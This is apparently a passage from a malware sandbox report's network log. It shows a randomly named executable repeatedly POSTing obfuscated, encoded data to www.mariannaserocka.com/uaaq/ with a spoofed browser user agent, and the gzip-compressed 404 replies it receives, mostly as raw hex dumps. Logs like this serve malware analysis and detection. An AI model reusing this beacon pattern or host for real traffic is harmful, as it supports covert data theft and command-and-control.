                                                                                    Dec 4, 2023 12:10:05.668349028 CET1340INData Raw: 35 d6 f7 c1 e6 29 b4 9e 77 38 18 7e 0f 29 fc 90 fa a0 9e 77 ba c3 ca d4 27 4f 0a e5 1b bc 3b 3f 02 25 44 d5 ad 2a 91 77 de 6a 8c 79 7e 09 77 7d ff c6 f8 1e 49 10 c8 28 d4 14 cc 01 5a e3 e5 e1 23 13 de 22 7c 7c 41 3c 6f 44 ec 13 b9 af cb 80 c6 e5
                                                                                    Data Ascii: 5)w8~)w'O;?%D*wjy~w}I(Z#"||A<oDXs?")m5R+vQs.9$Ex!xCMVJ9zcMRqD9|9,)0-8&@Rg/2pY^HyP2O!wDTdi
                                                                                    Dec 4, 2023 12:10:05.668406963 CET1340INData Raw: 2d ba a6 4d 38 74 38 8f 42 0f 41 f7 46 1d 93 96 eb 38 c1 3e 01 76 67 05 37 f4 f2 12 02 54 2d 12 65 25 6a 66 ab e3 d0 49 23 9a 8c 48 ad db 30 db bd 86 65 f5 1a 66 5d 01 23 04 89 35 b3 d3 69 f4 4d 48 6c d7 15 b4 4c f5 b5 a4 cb 12 ce 69 cb 62 5c 4f
                                                                                    Data Ascii: -M8t8BAF8>vg7T-e%jfI#H0ef]#5iMHlLib\OfZ1f7zJ kk<tF.LeWbf)!5]8NbeMAHvlhot@ Fi.H4I4m$k66sf%KDNvG7M =
                                                                                    Dec 4, 2023 12:10:05.668463945 CET1340INData Raw: 3c ab c2 29 6d 13 f3 c9 a9 3b 61 1b a8 14 52 98 7f 07 08 ca 8f 47 8a ad 64 f5 7a 3a 7b e2 fa 00 e7 22 9e 7f d6 04 ec 2a e1 3b 99 5f 96 e4 94 ef 6f 97 24 6f b2 25 32 b6 90 92 9d c2 d1 bb fb bb 9d 71 11 d2 05 ef 66 1c b1 a5 09 67 f7 53 2e e9 d5 1e
                                                                                    Data Ascii: <)m;aRGdz:{"*;_o$o%2qfgS.D&H/Zn]e]WdRX3{;V&.{{7dY8s6MfaL;:GvqeF9-WXkYol0^
                                                                                    Dec 4, 2023 12:10:05.668519974 CET1340INData Raw: ce 2a ce da 60 a5 c6 a8 98 b8 27 56 16 2c 9f 72 d3 26 24 cc 68 0a 24 eb 70 20 7c 11 81 d6 6a 95 a4 b8 02 b5 5e 88 74 d4 ef 10 47 aa 68 21 a1 58 4d 8e 96 33 58 cd 1e b7 a1 ac 6b 57 d0 0a 83 70 8e 53 99 8e a4 21 d5 78 d6 f3 6b 3a ce 5e ab 6f 28 65
                                                                                    Data Ascii: *`'V,r&$h$p |j^tGh!XM3XkWpS!xk:^o(e+a2,UED9%2z7)S!R>j)x2ij88^l#fvM?C/VvO)e.J'\~%tlw/W-868YsU7
                                                                                    Dec 4, 2023 12:10:05.668790102 CET1340INData Raw: aa e2 ef 25 38 2c db 96 7b 18 2a 96 9d a1 7b 18 38 96 4d c4 bd 0d 23 4b 15 b9 b7 41 65 a9 1e d7 0a 31 3f bf a5 70 db 1e 8d 0d cb 96 72 78 e8 24 36 9b 4a 2b b1 02 f2 b3 5d 22 ef b5 fa ed 7e 5f 5e 81 5e b3 30 ce 22 57 0f 7b 61 ba c6 97 e0 b1 69 be
                                                                                    Data Ascii: %8,{*{8M#KAe1?prx$6J+]"~_^^0"W{ai]c LpSwXhH^qX3YhU,JY(8ovwVlZ,:2$"3VfCV*:n56p?^N{Lm\~ZFXP,6f=Ows;7cKgv
                                                                                    Dec 4, 2023 12:10:05.668885946 CET1340INData Raw: 78 47 d9 fd dd 43 f6 e5 60 12 e6 7e 39 98 b4 e9 60 d2 6f 2d 20 fb 72 30 e9 be 05 6b 5f 0e 26 7d 39 98 f4 e5 60 52 45 6d 7e fb 21 df 97 83 49 f7 21 1c fc 72 30 e9 cb c1 a4 2f 07 93 be 1c 4c aa ac c7 5d 1f 4c 2a 26 17 ce 0a dc e9 fd dd 66 ab df 36
                                                                                    Data Ascii: xGC`~9`o- r0k_&}9`REm~!I!r0/L]L*&f6i[5G_J{V].zXExg-gF6hq=`{=x\q.T!Zv1hg[_)<d338TLOFoY2
                                                                                    Dec 4, 2023 12:10:05.669111967 CET1340INData Raw: f7 7a 86 39 32 ec 56 bf d3 1b ef 99 6d cb b4 e8 38 23 8e c0 1b 02 a1 1c 42 23 e3 84 4d e4 2f 42 9d 51 80 4e c1 62 20 fa 92 24 a4 a6 5c 28 4f 71 52 55 71 dc 88 cf ef 1d cf 0d c3 68 7b 49 f4 74 a0 fc ac 3c c5 07 e5 a3 72 a9 d4 ab 1c e6 55 b3 93 f5
                                                                                    Data Ascii: z92Vm8#B#M/BQNb $\(OqRUqh{It<rU =SJEEk{vt:{@" x0s oD/LqjSX& h$T/!8|C@8g~@6MkS`3Upx/ #B}95K_0d3Ny
                                                                                    Dec 4, 2023 12:10:05.669159889 CET265INData Raw: 8d ed 52 48 86 9e 3b ab ef 0b 8c 1d 00 2f 7f c3 51 4b ec 95 4c 87 79 0c 44 e9 18 02 1b 88 19 21 f1 e7 8f 50 f4 84 c7 31 78 77 dc 29 2d 4a f3 67 15 3d 81 10 ba e8 50 58 a6 46 9e 22 ba f4 c7 86 ca d7 a0 87 6c bd 72 98 4e c3 03 1b 4b a0 81 21 19 4f
                                                                                    Data Ascii: RH;/QKLyD!P1xw)-Jg=PXF"lrNK!OZkt53!n}{)-qC(p1h2MqVQuBT$6oD]Ize]l 5G|nLf<4Hm>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    83192.168.11.304984365.108.122.245803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:07.446028948 CET733OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4b 33 64 44 45 72 6d 77 67 57 51 67 43 6f 34 78 67 77 77 59 58 42 4f 4c 6e 4e 56 76 53 2f 53 70 56 36 52 53 48 53 41 73 42 66 33 73 53 4c 68 5a 7a 46 66 4c 52 67 7a 65 59 51 55 79 44 4b 35 63 43 4e 30 58 4f 6b 77 6c 33 56 61 75 67 6b 46 61 78 37 72 64 6f 50 30 66 47 72 72 51 77 30 59 71 74 6e 52 6c 79 43 49 41 47 56 49 52 59 33 75 33 38 6e 36 77 4c 6f 44 77 2f 78 33 2b 36 72 43 34 6b 35 2f 37 34 4c 71 76 78 66 4b 2b 45 48 39 4d 54 46 6c 6e 41 4d 65 62 46 5a 6b 2b 70 54 52 4d 55 41 55 31 32 6b 67 57 65 32 41 31 65 2f 67 71 55 69 71 37 53 6e 61 44 46 50 72 36 38 36 35 4d 6e 51 36 34 64 31 55 3d
                                                                                    Data Ascii: 9pG0L=K3dDErmwgWQgCo4xgwwYXBOLnNVvS/SpV6RSHSAsBf3sSLhZzFfLRgzeYQUyDK5cCN0XOkwl3VaugkFax7rdoP0fGrrQw0YqtnRlyCIAGVIRY3u38n6wLoDw/x3+6rC4k5/74LqvxfK+EH9MTFlnAMebFZk+pTRMUAU12kgWe2A1e/gqUiq7SnaDFPr6865MnQ64d1U=
                                                                                    Dec 4, 2023 12:10:08.354362965 CET1340INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:07 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 76 db 48 92 e0 b3 7d 4e fd 03 0c cf d8 64 17 01 02 e0 55 94 e4 1a b7 ed ea ae 29 bb ec 53 72 b5 77 a6 e4 c3 93 04 92 24 2c 10 40 03 a0 28 4a a5 97 79 d9 6f d8 4f d8 e7 7e db b3 4f db d3 ff b5 11 99 09 20 01 82 17 dd aa ad 2a fb 22 01 99 91 11 91 91 91 91 11 79 c3 c1 a3 97 6f 5f bc ff 8f 77 af 94 69 32 f3 9e 3d 3c c0 5f 8a ed 91 38 3e 54 f1 59 55 3c e2 4f 0e d5 d0 d3 de bd 56 11 80 12 e7 d9 c3 07 07 33 9a 10 c5 9e 92 28 a6 c9 a1 fa d3 fb 6f b5 be 8a e9 9e eb 9f 28 11 f5 a0 48 14 8c 5d 8f aa ca 34 a2 63 c4 96 84 f1 a0 d9 9c cc c2 89 1e 44 93 e6 d9 d8 6f 9a 26 14 4a b1 f9 64 46 0f 9f 46 c1 28 48 e2 a7 8a 1d f8 09 f5 93 c3 a7 7e e0 fa 0e 3d 6b 28 e3 c0 f3 82 c5 53 a5 09 6c e4 05 d4 53 97 2e c2 20 4a d4 ac 88 ba 70 9d 64 7a e8 d0 53 d7 a6 1a 7b 69 28 ae ef 26 2e f1 b4 d8 26 1e 3d 34 19 b3 8f 34 4d 79 3f 75 63 25 76 13 aa c0 ef 20 4c dc 99 7b 4e 1d 65 e1 26 53 25 99 52 e5 3f 02 12 27 ca d1 ab b7 4a e8 cd 27 ae af 9c 5a a6 de 51 34 25 ad d0 12 01 74 3b 98 35 17 41 e4 84 11 8d e3 26 07 8d 9b 31 0d 9a 8a a6 21 ad c4 4d 3c fa ec 1d 99 50 c5 0f 12 a8 cc dc 77 00 cb 1b 12 b9 c4 f7 89 72 44 a3 c0 3e 21 07 4d 0e 98 0a 05 a4 18 d2 28 59 1e aa c1 64 e0 05 c8 bc 54 d1 d0 1b 42 b3 a0 44 aa c0 19 26 09 7a 2b f1 b5 98 50 3e 43 14 b7 84 6d 4d e1 d8 8e dc 30 51 92 65 08 6d 43 c2 d0 73 6d 92 b8 81 df f4 9c af 3f c5 81 af a6 ea c5 e4 06 cd 31 a5 33 a2 4d 22 12 4e d5 67 17 ea bf 31 fc 67 89 3a c8 34 86 83 a0 ce a8 0d f5 df 38 e4 e0 67 00 45 1a 00 f7 81 8e 8e 80 3f cc 74 1d a9 dc 4c 30 18 73 fe 58 13 3d 5e d0 51 cc 81 e7 91 b7 05 18 80 58 9d 07 ab 75 6d a8 0e e5 35 85 aa 01 c0 7b 3a 0b 3d 02 4a f4 bd 9b 40 66 38 1f 79 6e 3c a5 91 3a b8 d8 85 2b 51 c7 26 48 1c 44 d4 6c 77 1d d2 35 f7 0c 32 36 69 67 34 ea 77 db e3 7e ab df e9 1b 1d ba 47 ad 8e a5 5e 02 89 00 9b 01 34 fa b9 cd 79 90 24 72 44 49 64 4f 45 46 43 4d 48 34 a1 09 63 45 00 bc f2 93 68 f9 0e 3a 56 c2 05 91 b2 bf 85 cf 6f e2 c3 8b 98 e1 1e 26 34 9a 0d e3 24 72 fd c9 25 b2 f3 d7 39 8d 96 9a eb 87 73 6c ba 88 fe 75 ee 46 d0 8d 58 17 5d 2d a2 5e 7e 6c a8 ae ff 1a 6c cb 1c 94 12 4a 70 03 73 d9 c8 78 fc 59 7d c7 84 01 0c be 8d 26 c4 77 cf 99 1a a9 1f 77 6a e6 ab 0a 34 6b 69 e2 cc 5c a4 e9 ce 18 5f b9 c8 be c3 84 b7 a3 4f d4 46 99 55 f0 7e 1d be 18 95 e6 4e ca b8 08 35 d1 f5 9a f3 d0 0b 88 13 37 2d c3 6a 35 4d a3 69 43 57 0d a9 a3 19 86 39 a4 0e 68 b7 a3 75 f4 4f 21 76 17 51 e4 a7 3b 42 cf 6c ab 3a e8 98 56 43 9d 52 77 32 4d c4 8b 4d d2 9e c1 05 0a 1a e2 05 93
                                                                                    Data Ascii: }vH}NdU)Srw$,@(JyoO~O *"yo_wi2=<_8>TYU<OV3(o(H]4cDo&JdFF(H~=k(SlS. JpdzS{i(&.&=44My?uc%v L{Ne&S%R?'J'ZQ4%t;5A&1!M<PwrD>!M(YdTBD&z+P>CmM0QemCsm?13M"Ng1g:48gE?tL0sX=^QXum5{:=J@f8yn<:+Q&HDlw526ig4w~G^4y$rDIdOEFCMH4cEh:Vo&4$r%9sluFX]-^~llJpsxY}&wwj4ki\_OFU~N57-j5MiCW9huO!vQ;Bl:VCRw2MM
                                                                                    Dec 4, 2023 12:10:08.354464054 CET1340INData Raw: e0 7a dd 41 48 09 70 c4 d0 48 cf 63 54 8e 0d e5 d5 8f 97 1f 2f 0f 9a bc 7b a6 66 be b9 62 c8 75 66 98 1f 3e cc 87 ac a7 8e 1f 6b 60 c0 c7 34 b1 a7 4f f9 b8 f5 b4 92 04 1f 84 f2 b1 8e 78 a0 dc 3e 76 a0 0a c3 17 c5 f1 d7 67 38 94 32 7b bc 6a 38 95
                                                                                    Data Ascii: zAHpHcT/{fbuf>k`4Ox>vg82{j8'<W'>)"tnyR-;'D;@,3`!#$`bPPGEq3h<MViuC7=gcGCz _q<Yd~B\
                                                                                    Dec 4, 2023 12:10:08.354533911 CET1340INData Raw: 35 d6 f7 c1 e6 29 b4 9e 77 38 18 7e 0f 29 fc 90 fa a0 9e 77 ba c3 ca d4 27 4f 0a e5 1b bc 3b 3f 02 25 44 d5 ad 2a 91 77 de 6a 8c 79 7e 09 77 7d ff c6 f8 1e 49 10 c8 28 d4 14 cc 01 5a e3 e5 e1 23 13 de 22 7c 7c 41 3c 6f 44 ec 13 b9 af cb 80 c6 e5
                                                                                    Data Ascii: 5)w8~)w'O;?%D*wjy~w}I(Z#"||A<oDXs?")m5R+vQs.9$Ex!xCMVJ9zcMRqD9|9,)0-8&@Rg/2pY^HyP2O!wDTdi
                                                                                    Dec 4, 2023 12:10:08.354598045 CET1340INData Raw: 2d ba a6 4d 38 74 38 8f 42 0f 41 f7 46 1d 93 96 eb 38 c1 3e 01 76 67 05 37 f4 f2 12 02 54 2d 12 65 25 6a 66 ab e3 d0 49 23 9a 8c 48 ad db 30 db bd 86 65 f5 1a 66 5d 01 23 04 89 35 b3 d3 69 f4 4d 48 6c d7 15 b4 4c f5 b5 a4 cb 12 ce 69 cb 62 5c 4f
                                                                                    Data Ascii: -M8t8BAF8>vg7T-e%jfI#H0ef]#5iMHlLib\OfZ1f7zJ kk<tF.LeWbf)!5]8NbeMAHvlhot@ Fi.H4I4m$k66sf%KDNvG7M =
                                                                                    Dec 4, 2023 12:10:08.354655981 CET1340INData Raw: 3c ab c2 29 6d 13 f3 c9 a9 3b 61 1b a8 14 52 98 7f 07 08 ca 8f 47 8a ad 64 f5 7a 3a 7b e2 fa 00 e7 22 9e 7f d6 04 ec 2a e1 3b 99 5f 96 e4 94 ef 6f 97 24 6f b2 25 32 b6 90 92 9d c2 d1 bb fb bb 9d 71 11 d2 05 ef 66 1c b1 a5 09 67 f7 53 2e e9 d5 1e
                                                                                    Data Ascii: <)m;aRGdz:{"*;_o$o%2qfgS.D&H/Zn]e]WdRX3{;V&.{{7dY8s6MfaL;:GvqeF9-WXkYol0^
                                                                                    Dec 4, 2023 12:10:08.354712009 CET1340INData Raw: ce 2a ce da 60 a5 c6 a8 98 b8 27 56 16 2c 9f 72 d3 26 24 cc 68 0a 24 eb 70 20 7c 11 81 d6 6a 95 a4 b8 02 b5 5e 88 74 d4 ef 10 47 aa 68 21 a1 58 4d 8e 96 33 58 cd 1e b7 a1 ac 6b 57 d0 0a 83 70 8e 53 99 8e a4 21 d5 78 d6 f3 6b 3a ce 5e ab 6f 28 65
                                                                                    Data Ascii: *`'V,r&$h$p |j^tGh!XM3XkWpS!xk:^o(e+a2,UED9%2z7)S!R>j)x2ij88^l#fvM?C/VvO)e.J'\~%tlw/W-868YsU7
                                                                                    Dec 4, 2023 12:10:08.354814053 CET1340INData Raw: aa e2 ef 25 38 2c db 96 7b 18 2a 96 9d a1 7b 18 38 96 4d c4 bd 0d 23 4b 15 b9 b7 41 65 a9 1e d7 0a 31 3f bf a5 70 db 1e 8d 0d cb 96 72 78 e8 24 36 9b 4a 2b b1 02 f2 b3 5d 22 ef b5 fa ed 7e 5f 5e 81 5e b3 30 ce 22 57 0f 7b 61 ba c6 97 e0 b1 69 be
                                                                                    Data Ascii: %8,{*{8M#KAe1?prx$6J+]"~_^^0"W{ai]c LpSwXhH^qX3YhU,JY(8ovwVlZ,:2$"3VfCV*:n56p?^N{Lm\~ZFXP,6f=Ows;7cKgv
                                                                                    Dec 4, 2023 12:10:08.354980946 CET1340INData Raw: 78 47 d9 fd dd 43 f6 e5 60 12 e6 7e 39 98 b4 e9 60 d2 6f 2d 20 fb 72 30 e9 be 05 6b 5f 0e 26 7d 39 98 f4 e5 60 52 45 6d 7e fb 21 df 97 83 49 f7 21 1c fc 72 30 e9 cb c1 a4 2f 07 93 be 1c 4c aa ac c7 5d 1f 4c 2a 26 17 ce 0a dc e9 fd dd 66 ab df 36
                                                                                    Data Ascii: xGC`~9`o- r0k_&}9`REm~!I!r0/L]L*&f6i[5G_J{V].zXExg-gF6hq=`{=x\q.T!Zv1hg[_)<d338TLOFoY2
                                                                                    Dec 4, 2023 12:10:08.355038881 CET1340INData Raw: f7 7a 86 39 32 ec 56 bf d3 1b ef 99 6d cb b4 e8 38 23 8e c0 1b 02 a1 1c 42 23 e3 84 4d e4 2f 42 9d 51 80 4e c1 62 20 fa 92 24 a4 a6 5c 28 4f 71 52 55 71 dc 88 cf ef 1d cf 0d c3 68 7b 49 f4 74 a0 fc ac 3c c5 07 e5 a3 72 a9 d4 ab 1c e6 55 b3 93 f5
                                                                                    Data Ascii: z92Vm8#B#M/BQNb $\(OqRUqh{It<rU =SJEEk{vt:{@" x0s oD/LqjSX& h$T/!8|C@8g~@6MkS`3Upx/ #B}95K_0d3Ny
                                                                                    Dec 4, 2023 12:10:08.355091095 CET265INData Raw: 8d ed 52 48 86 9e 3b ab ef 0b 8c 1d 00 2f 7f c3 51 4b ec 95 4c 87 79 0c 44 e9 18 02 1b 88 19 21 f1 e7 8f 50 f4 84 c7 31 78 77 dc 29 2d 4a f3 67 15 3d 81 10 ba e8 50 58 a6 46 9e 22 ba f4 c7 86 ca d7 a0 87 6c bd 72 98 4e c3 03 1b 4b a0 81 21 19 4f
                                                                                    Data Ascii: RH;/QKLyD!P1xw)-Jg=PXF"lrNK!OZkt53!n}{)-qC(p1h2MqVQuBT$6oD]Ize]l 5G|nLf<4Hm>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    84192.168.11.304984465.108.122.245803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:10.163456917 CET1650OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4b 33 64 44 45 72 6d 77 67 57 51 67 43 6f 34 78 67 77 77 59 58 42 4f 4c 6e 4e 56 76 53 2f 53 70 56 36 52 53 48 53 41 73 42 66 76 73 53 59 35 5a 38 46 6a 4c 57 67 7a 65 56 77 55 2f 44 4b 35 4e 43 4c 63 54 4f 6b 38 54 33 58 79 75 67 48 4e 61 33 4b 72 64 78 66 30 66 5a 37 72 56 30 30 59 37 74 6e 42 70 79 47 6b 41 47 56 49 52 59 78 4b 33 35 46 53 77 4a 6f 43 43 70 68 33 79 73 72 43 51 6b 35 33 42 34 4c 65 52 78 76 71 2b 48 6e 4e 4d 52 33 4e 6e 4d 4d 65 5a 4a 35 6c 6a 70 54 64 44 55 41 67 35 32 6b 6b 34 65 78 45 31 55 36 64 48 52 41 43 47 46 45 75 39 41 73 2f 51 6b 74 39 4a 32 6a 54 2f 66 69 47 47 71 67 71 37 4b 39 30 68 2b 53 6e 48 4c 4a 58 4b 71 6f 49 64 6b 31 30 52 6f 52 55 4c 58 56 2f 31 4b 78 68 34 32 66 73 2f 6b 47 70 6e 39 6b 48 46 2b 70 74 78 66 47 65 34 2f 45 37 63 74 37 64 53 73 2b 6e 61 4c 55 45 6b 50 4d 7a 76 73 6d 75 52 61 37 48 30 2b 6d 31 67 62 69 72 77 4a 30 65 6c 36 6e 44 35 34 73 63 48 6a 32 42 4e 32 65 38 75 53 42 66 57 66 2f 7a 35 30 62 68 6b 74 32 6e 35 64 6f 53 79 59 77 36 77 47 4b 56 2f 68 63 61 32 4e 2f 52 54 73 33 54 4f 4d 77 69 48 72 65 54 6c 39 64 70 76 2f 2b 53 41 31 79 6e 41 59 42 78 30 41 57 79 6e 74 69 5a 44 77 68 54 44 55 4a 42 4f 2b 31 4a 79 38 6f 6f 69 59 63 62 44 77 4f 79 61 76 56 44 4c 56 47 74 4d 55 6a 52 64 63 75 67 64 55 2b 78 70 43 61 67 30 36 63 6d 6c 35 4a 4f 59 73 37 46 33 74 54 50 55 35 54 33 57 70 67 58 4d 30 6d 42 45 73 47 6a 77 2b 6a 5a 62 58 6f 58 57 6a 4f 42 6f 37 52 44 68 72 63 33 6a 4f 4e 67 6d 63 64 66 78 37 73 6a 55 68 70 45 5a 58 62 37 33 74 2b 7a 35 6f 51 4d 5a 75 74 6c 7a 59 49 38 4a 73 68 4e 45 53 67 68 65 6b 34 66 35 58 4b 4e 67 6e 31 75 71 31 75 62 33 53 38 6c 50 69 4d 32 51 4f 2f 77 6f 69 6c 33 64 77 36 32 4f 58 45 71 7a 66 66 53 42 6c 47 4b 4f 4c 57 59 71 45 51 61 69 71 61 4b 72 6a 4a 6c 2b 77 71 54 70 6e 70 45 2b 4a 78 4d 66 33 54 33 54 43 46 6e 50 67 35 33 56 48 34 42 33 6a 78 76 55 53 32 61 6c 31 37 34 4a 4b 65 53 46 38 69 34 34 68 4c 59 52 72 33 61 61 4d 45 73 70 4f 4f 50 52 39 4b 74 59 62 75 4f 70 34 73 6c 49 44 39 47 65 6e 38 52 6a 4c 37 36 56 46 31 43 79 51 30 76 69 76 2b 70 4e 6c 2f 4b 75 5a 6d 6e 68 69 2b 77 63 31 31 57 44 6a 66 6d 38 7a 6c 52 4e 73 71 6b 44 54 37 76 69 73 53 35 37 52 4c 6a 45 51 66 4b 32 33 7a 6a 72 32 75 75 56 4f 31 39 72 79 43 6f 4b 6c 41 61 52 4a 47 6b 66 61 35 73 55 69 78 52 64 4c 6c 72 79 47 59 42 71 79 74 49 48 7a 56 42 53 74 76 68 4c 68 67 4b 34 73 39 68 2f 71 31 57 73 4f 41 2f 75 30 34 4d 75 50 53 68 6a 61 37 6c 6c 47 34 48 37 79 7a 4b 59 30 57 35 66 73 70 2b 51 7a 65 68 4b 33 6e 33 32 4a 45 48 73 63 5a 2b 73 58 2f 35 33 69 49 62 37 41 2b 75 78 6c 67 6b 6c 6f 59 7a 6f 7a 6d 59 38 47 54 79 6b 4c 49 44 43 79 4d 59 62 51 74 71 64 6f 4d 2f 59 6b 59 47 6a 37 5a 37 4d 61 78 59 53 68 5a 4a 7a 47 2f 2b 54 35 57 73 70 4f 61 66 47 34 7a 46 32 71 49 31 65 43 36 32 79 4e 58 36 52 4b 31 70 44 64 4b 49 6a 63 54 63 39 49 61 37 64 61 6f 55 52 61 4d 4a 36 6d 58 49 72 4b 39 68 2f 31 58 4b 77 70 66 53 69 44 31 31 73 4c 41 6d 5a 64 35 68 42 53 70 2f 7a 36 68 68 63 49 68 4c 52 62 31 57 64 33 4d 65 70 74 36 50 58 39 50 43 47 4a 62 58 6f 46 41 4b 67 70 69 67 68 49 66 66 47 77 77 51 6e 6f 4c 4f 59 4f 38 6b 34 57 31 39 71 55 51 6f 70 4e 33 71 44 4c 44 2b 71 39 6d 68 36 42 72 34 64 6e 71 56 67 4f 72 69 5a 72 51 48 50 70 6d 2f 56 72 46 33 32 54 32 70 6d 49 6f 45 33 48 70 79 50 71 65 54 56 6b 39 4c 75 7a 6f 32 61 75 73 6c 67
                                                                                    Data Ascii: 9pG0L=K3dDErmwgWQgCo4xgwwYXBOLnNVvS/SpV6RSHSAsBfvsSY5Z8FjLWgzeVwU/DK5NCLcTOk8T3XyugHNa3Krdxf0fZ7rV00Y7tnBpyGkAGVIRYxK35FSwJoCCph3ysrCQk53B4LeRxvq+HnNMR3NnMMeZJ5ljpTdDUAg52kk4exE1U6dHRACGFEu9As/Qkt9J2jT/fiGGqgq7K90h+SnHLJXKqoIdk10RoRULXV/1Kxh42fs/kGpn9kHF+ptxfGe4/E7ct7dSs+naLUEkPMzvsmuRa7H0+m1gbirwJ0el6nD54scHj2BN2e8uSBfWf/z50bhkt2n5doSyYw6wGKV/hca2N/RTs3TOMwiHreTl9dpv/+SA1ynAYBx0AWyntiZDwhTDUJBO+1Jy8ooiYcbDwOyavVDLVGtMUjRdcugdU+xpCag06cml5JOYs7F3tTPU5T3WpgXM0mBEsGjw+jZbXoXWjOBo7RDhrc3jONgmcdfx7sjUhpEZXb73t+z5oQMZutlzYI8JshNESghek4f5XKNgn1uq1ub3S8lPiM2QO/woil3dw62OXEqzffSBlGKOLWYqEQaiqaKrjJl+wqTpnpE+JxMf3T3TCFnPg53VH4B3jxvUS2al174JKeSF8i44hLYRr3aaMEspOOPR9KtYbuOp4slID9Gen8RjL76VF1CyQ0viv+pNl/KuZmnhi+wc11WDjfm8zlRNsqkDT7visS57RLjEQfK23zjr2uuVO19ryCoKlAaRJGkfa5sUixRdLlryGYBqytIHzVBStvhLhgK4s9h/q1WsOA/u04MuPShja7llG4H7yzKY0W5fsp+QzehK3n32JEHscZ+sX/53iIb7A+uxlgkloYzozmY8GTykLIDCyMYbQtqdoM/YkYGj7Z7MaxYShZJzG/+T5WspOafG4zF2qI1eC62yNX6RK1pDdKIjcTc9Ia7daoURaMJ6mXIrK9h/1XKwpfSiD11sLAmZd5hBSp/z6hhcIhLRb1Wd3Mept6PX9PCGJbXoFAKgpighIffGwwQnoLOYO8k4W19qUQopN3qDLD+q9mh6Br4dnqVgOriZrQHPpm/VrF32T2pmIoE3HpyPqeTVk9Luzo2auslg
                                                                                    Dec 4, 2023 12:10:11.099560022 CET1340INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:10 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 76 db 48 92 e0 b3 7d 4e fd 03 0c cf d8 64 17 01 02 e0 55 94 e4 1a b7 ed ea ae 29 bb ec 53 72 b5 77 a6 e4 c3 93 04 92 24 2c 10 40 03 a0 28 4a a5 97 79 d9 6f d8 4f d8 e7 7e db b3 4f db d3 ff b5 11 99 09 20 01 82 17 dd aa ad 2a fb 22 01 99 91 11 91 91 91 91 11 79 c3 c1 a3 97 6f 5f bc ff 8f 77 af 94 69 32 f3 9e 3d 3c c0 5f 8a ed 91 38 3e 54 f1 59 55 3c e2 4f 0e d5 d0 d3 de bd 56 11 80 12 e7 d9 c3 07 07 33 9a 10 c5 9e 92 28 a6 c9 a1 fa d3 fb 6f b5 be 8a e9 9e eb 9f 28 11 f5 a0 48 14 8c 5d 8f aa ca 34 a2 63 c4 96 84 f1 a0 d9 9c cc c2 89 1e 44 93 e6 d9 d8 6f 9a 26 14 4a b1 f9 64 46 0f 9f 46 c1 28 48 e2 a7 8a 1d f8 09 f5 93 c3 a7 7e e0 fa 0e 3d 6b 28 e3 c0 f3 82 c5 53 a5 09 6c e4 05 d4 53 97 2e c2 20 4a d4 ac 88 ba 70 9d 64 7a e8 d0 53 d7 a6 1a 7b 69 28 ae ef 26 2e f1 b4 d8 26 1e 3d 34 19 b3 8f 34 4d 79 3f 75 63 25 76 13 aa c0 ef 20 4c dc 99 7b 4e 1d 65 e1 26 53 25 99 52 e5 3f 02 12 27 ca d1 ab b7 4a e8 cd 27 ae af 9c 5a a6 de 51 34 25 ad d0 12 01 74 3b 98 35 17 41 e4 84 11 8d e3 26 07 8d 9b 31 0d 